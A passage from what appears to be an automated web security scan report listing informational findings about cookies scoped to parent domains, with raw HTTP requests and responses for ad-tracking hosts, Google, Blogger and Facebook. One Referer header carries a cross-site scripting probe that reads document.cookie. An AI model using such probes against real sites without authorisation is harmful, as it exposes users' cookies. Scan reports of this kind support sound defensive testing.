bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=UE2gfLUR22QsHNJo; bkc=KJh56AN/PaWDOded7UcDzVSyZWP3EWcGSWJDvJivmD1nStebQYQBLzxwSYaVZhnEWDxALA6afSxQS0aRTvnGSps6SOzWxMOrQCYeiej3Wag7Fw4rrlwr8MNIFwX88lcFvjxe7bXeTSN1PQWGAeIBuFKVseXn9dDExmNbJCrWzFhQEw3IjSfU4CQOuLLPZ+454rheH0c1KKNXCKrqUTtwHbuMKK1ymE6kwEQ+dKsHXSLxrx5RcedkIlHWZr5gFbwbWooUrsDXK6YSX2GXM2IpPPtmaflF4I1cL0cWo2M+12nn0XjePnuys8MFmrcDL82S87fSKU3X39aZq74uKV2ULozLzN8fUypGgkBT7DrH7NKy40RCpc7+KIHppxgJsIkLacF9c3bE8gptJmNw3WaCw87dMdtu23FRu8S8U7rrpwDs7Dz9FyqR7UluvzrJYK1arLLttg5dwp3z4rhMkgZdBC6dHL74ilpPz32krQf4yfxFvhKOnbr+F3+i6k0FcRLYmfLDwrjS4sIPu7BKIp05EI1/1eJolsYjX2GUFwX2Tp77pqXVBn8LIDIlzDdxpqXB+Be2OhhwJbx4B6AdLUyo3Upd2FqdVXe+ppTqAx8ru1IPv5IPl76PiohoAkfqk/fFPqffF4l4KUmW2LwNdaNMKwLf5nMH0qwE5bHUSoUyIbH65qN6K6gbomUWaKwdFfdTqQ==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:51:17 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 04 Feb 2011 20:51:17 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=Rs4UCXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56AN/PaWDOded7UcDzVSyZWPZEWcGSWJAvsivmA1nStebQYQBbRBuzYamqEHuHhYH6eRP+JmYg/PQQRrigXUxGk6xY1s6YD/1/+3RxVu5X2bffXb8ZhkIFwX88lnFvPRYcbTOTSN1PQWGA+IwuQIDsEXm9ytExBNsJCrWz7plCFx50N0F4uXYkaz3+sbTd5Qce6mRX23av+5M7T0f/2nHQ7sR7JbVFMGMd4SIX41xrH2RF77z2TZ/B1dU4AlNjEuFmsTX+NISX2GXMdd7S7G5nlF4dXxwjWm/Ef1fjbPUPT6c3VCoJfeRK2uojpI0pwt6YdEp+OSR7KiCId8qpPbhpc7+FEsQgNfCHE8a4knadobW1mKNq8Bw+0GAgbKpDKyYKbCKZFwSDfxdGDSa4VxIcdLjfPKoP0hpF4jYCK+BrGX94khC2N0xEkkmEOGF6P+t6nf2I2qk2smlVIqIt7E2sYPdn4sy8xcn2O0ICtC4NLTOcpX4XP6EAIjbfPQDtBbCXYf487rgUJgptZ4G4oosQJWoT6qn7BzIb8llomKXBpXUBn8GIUK4zUdxpqXv+BcfOhpwJvx4+WQd+cyI3Upd2wqduXe+ppTPAx8rui2DvBdPl7LPu8hoAPfdJHl4Glh42FjdItDp7uKUR0dmsXwqlXaeEDbK7qTkFPS7CBXAoUzlucKZo/2jEky0dQIhCFGy; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:51:17 GMT; path=/; domain=.bluekai.com
BK-Server: a96f
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

12.90. http://tags.bluekai.com/site/365  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/365

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/365 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bko=KJpMTsPQAJe62ZPAWmPMRnC3fxhA3xnadgI6Oq/ZLEWyw9s0tOiXKuWLHQR8wCMgekeLm818AYDJaWFPNyv09JtgWxy=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeiItK1DQ2DeZe/OOnucgf4gN2FqcRgzDKHQ1P9ND/VE9yPYr8a3TyHPRwzGIqSi7En/8LKIFfdglEXTgLyXe3guyjs9fIYmxXMSnIwNe2gf3LwuVE1IhC5e8xwE1eaNe2AF7KmjGV/BKOlmdRy9YZD8Gjsn8MXzzrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9/usgtT=; bk=viY1yZVZbt/sHNJo; bkc=KJh566N/PaWDOded7uX5jySnVExVAh9b4AODvaCJmD1nStnbQYQBbRBuSYWp+uAocDaW/++D6YTvLCSYOubvoko1n+GaQHO1Z0eYx1vBsDx48Xhf2NlwlqpcMdzd2f8fpftk1n9y9ixSer5XYvaW4Z58/s9XPQLWVhDSgtE/MVlL8lA/pN7ZKrlp0Fc4Pp+p9Hxvf9KlMYrDdl9jYv2kzdxJfw58SSfU4AndNp/vBYNkzlbG3rImuBIhpwUS20J93aSCzXAjMfN2aTx8gNtrzlpNAdcIicu6qOyZjXSkn68/FfNFdYJ/fQ5Zghd04Yxip4BgFbqb91NUrVRX+DtSX2GXcfI7WgNPpfg44X4qzAcWh275A2npXXSePeupAUgVKbOSpl8LZz4En+wMtVjQXARwf4K4KFSzjz8gqT6O4z6vnT+oX+1b27/vyopUFA6Il3ZxGF1PhuSyC83kmSX2UKBTk5qMyTXnfJTp6Z7n0PcMsKgaUMGFdffF3bbwF5L0Mb2BtTzXIKLbUf/XRJZt6d1x2UFhawehXhfwijQ6NtFcG7uUBiQLanLXgTVAmS22Qr8EIp9ywsqzSo7pti45dpl3rrMmUd9q7fUX3XITlIdAufTrboIFbGZA211mbDKVEbKD8hUldcfhmKmpM6VAdSFu6pUvzflqgXGbjprAFdtDMZ2H7rsKgXW5fjTpBbDUZ8EyZ8H6xT+65NgbGmUAmKwdAK9Ydx==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 21:59:56 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 04 Feb 2011 21:59:56 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=gsKMbtVZbt/sHNJo; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NW+GWNWDOrOdXZgEJnuuCSAuY2vAehYPa3GVqRvnSAoXQBCVQQI6OHzC6R6VqH1GoRCNGT/fDqYbvauCYXV3i2iam6WGYcWMiaxGT3jVWOd7EmqmfqZqZ47/4Ib8zII58Yl9Vyj0iRWLwuJwk8hwKpW/n/6OLKSOg9zOttXBzN88GCfy+N+GrjyZ+luy7hDQwsIRb8Uwm4ldF+0P2SaRjBId3Ptkdw+nxc92RXIwdSTQp4UvMtkIqKB9b6GZbTPkIXbR2sleUv2XByxWbiN6g2EsRIdReVcmvNzSSgf0D4+9ueoz6xbu6tUoY8wuqI8owdKECTs8ST55cykJzldkPNEFGlfP32gEtbD8gXp2IeT5bfz28dpIm23H2uBSjF5muuXLS/2x6KyZtgwIQlR2I8aCcAI8xoK7VTYoblt6l7XSt4msmSIXnx/1Ju0XvvU/EhgR36A/zNf8aFkT+TDA7SXyBG12ZoeZFwJ1UzNg2eTK4edwfML+7E/zc2KKoqlRHI4klf422Frh2hMZXjPoIP9Q427QiTjpCZA8URdu4iXw9CXIfUD5i6CpFU/AEB2uATVkDGdg2R9688Pw6w4DZS4dCx7+5LmzPpfopwKGT8nEFIMPwZwTN8etLnKVUdE66w88qWdsoH26uEX64Yoor4fC7Bdw7+gTfs1CSKIS2W058qgHtSd3OZKbondIk/8r+PpemPXMmp+5ot2/nf5Sy3IE6LN+6g6obDmsTtKNdymwKyqy; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 21:59:56 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

12.91. http://translate.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:56 GMT
Expires: Thu, 03 Feb 2011 20:32:56 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=705d98a7bc0e380c:TM=1296765176:LM=1296765176:S=sHB4e3nekqE-YD1z; expires=Sat, 02-Feb-2013 20:32:56 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

12.92. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Impression/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Tracking/V3/Instream/Impression/?0|1574|42244|30521|5745|14160|HEADER|868|2293|413|BBEEND|&internalRedirect=true&cb=%timestamp%&ss_rand=98204660 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Date: Thu, 03 Feb 2011 21:14:09 GMT
Expires: -1
Location: http://ad.doubleclick.net/ad/N3340.scanscout.com/B4852812.30;sz=1x1;pc=[TPAS_ID];ord=[634323464497011872]?
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Pragma: no-cache
Server: Microsoft-IIS/7.0
Set-Cookie: vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; domain=.vindicosuite.com; expires=Sat, 05-Mar-2011 21:14:09 GMT; path=/
Set-Cookie: 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; domain=.vindicosuite.com; expires=Fri, 03-Feb-2012 21:14:09 GMT; path=/
Set-Cookie: 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; domain=.vindicosuite.com; expires=Fri, 03-Feb-2012 21:14:09 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 0
Connection: keep-alive


12.93. http://uat.netmng.com/pixel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uat.netmng.com
Path:   /pixel/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/?aid=148&tax=home HTTP/1.1
Host: uat.netmng.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evo5=kvrgygjr7baud%7C5SyprRh6TrnFV2ndAy2HxCPgLLX3cZ%2FVfx%2FM0biott%2BcqVbJj5aCj55h7IXdjMgE9ed9rfydUW6gLxzZ4Z8iZfTCEnvI5PEwDP8UgnDwsNwf1a3vDJnVlaVWQNH%2F7d2VqxBrm0%2Fc%2FidZYflVD0ff%2F1E5rmifbqDgfH2Gt1zhs%2F2MnA08vEEPGokDm1Bn1W68QLHQ%2FzChSJMJNtyVsrnHyb3E37wmvDfW6FFUnXFOPDqGRb7GXzLEZaSRaSPR19puBUpHlUpXwBEY7g3LfZ4F7q%2FoPuX4s88d6II7AqTrPBQvVC3dTHYL6Y342A5GTpvcniShvZas%2BmBrU%2Fz%2FqdmcKtLQoSpK8%2F1EMObPX4EqA7WzFB9kMN0WKt0l5SlxdqQCviV0iLESOVRgETizb2Os%2Fh1P9v%2FlebIMxnWdfb6%2Byln%2FJfmz2fudQYM%2FGfUhPWgueSqcoFf5wfZykby2hBxGOg%3D%3D

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:03:59 GMT
Server: Apache/2.2.9
P3P: policyref="http://uat.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Tue, 01 Feb 2011 19:03:59 GMT
Last-Modified: Tue, 01 Feb 2011 19:03:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=kvrgygjr7baud%7CslbpB2OTqHJebVm%2BWLYhLSxmpA%2Bk0H4X%2BmBxXDdVODzOuKT2fiN3y3Y5%2FY%2FsvrMTk5MmDBp7hV7I6KwNAhVYdGvfRM%2Bt5tHVREa3RQX0svzHDl1LVEJkUgauiKULoRLwV%2Bz9EfZ7EbNR6AyPAOiKR2YDLplc5ZP%2FSQ6vGBOIIKPOPjcxxchwc%2Bo4nA5%2BXAHnXvznrsmn%2BcXyzWJFyo%2F7gsKfwS18nNxmub3nTC7jXt6PqmgrUCGB0%2B0vqAMDbEWNWkKk8aNor%2FvzClvR9YGDE1DDjaV8XMfY5k93PKcy7%2BcHAUsxt54LRmbEVOmofd1fIHKn0lsrW9GvKMll8AI8rXfZqe1UwR5PeLBmj4zS2RGDv2trchNe4um3wRa%2BvF6pKy4VT%2BDhUwGQ4LAm8Yog8lNAItduejTtfC9gbzyZMGm7yKAmWVLRZLZBSm7SpNBnA4SM6uA0wtdfTynqTvb5Hw%3D%3D; expires=Fri, 05-Aug-2011 19:03:59 GMT; path=/; domain=.netmng.com
Location: http://ad.yieldmanager.com/pixel?id=582755&id=584778&id=584789&t=2
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8


12.94. http://video.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 20:33:04 GMT
Expires: Thu, 03 Feb 2011 20:33:04 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=1be32f5d81ed4b3b:TM=1296765184:LM=1296765184:S=XUl03TgBOSGxaiOV; expires=Sat, 02-Feb-2013 20:33:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...

12.95. http://w.ic.tynt.com/b/o  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.ic.tynt.com
Path:   /b/o

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/o?id=cD5Q7abi8r4inHadbi-bnq&i=http%3A%2F%2Fa.collective-media.net%2Fadi%2Flb.buzzillions%2F%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bord%3D1296770389%3F&ts=1296770455256 HTTP/1.1
Host: w.ic.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 03 Feb 2011 22:00:05 GMT
Content-Type: image/gif
Content-Length: 35
Last-Modified: Mon, 22 Nov 2010 21:57:50 GMT
Connection: keep-alive
Cache-Control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
Expires: "Sat, 26 Jul 1997 05:00:00 GMT"
Set-Cookie: uid=CgUVak1LJWWFQj/PC/lcAg==; expires=Fri, 03-Feb-12 22:00:05 GMT; domain=tynt.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Accept-Ranges: bytes

GIF89a.............,...........D..;

12.96. http://www.blogger.com/comment-iframe.g  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogger.com
Path:   /comment-iframe.g

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comment-iframe.g?blogID=722867207364741287&postID=3730301442720466539&blogspotRpcToken=6110411 HTTP/1.1
Host: www.blogger.com
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/2011/01/abstract-white-paper-relative.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=9268244d0e3d1ace:TM=1294785636:LM=1294785636:S=mgdFOGdwXJw4zKJI; blogger_TID=216bd5db56d4b0a7

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Fri, 04 Feb 2011 16:11:24 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: S=blogger=rH95d6qnP5YSnOV4s87roA; Domain=.blogger.com; Path=/; HttpOnly
Server: GSE
Content-Length: 28674

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Blogger: Penetration Testing | Hoyt LLC - Post a Comment</title>
<link href="http
...[SNIP]...

12.97. http://www.facebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:20 GMT
Content-Length: 30803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

12.98. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=xRgPt; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:29 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

12.99. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 05-Mar-2011 21:49:22 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:22 GMT
Content-Length: 0


12.100. http://www.facebook.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

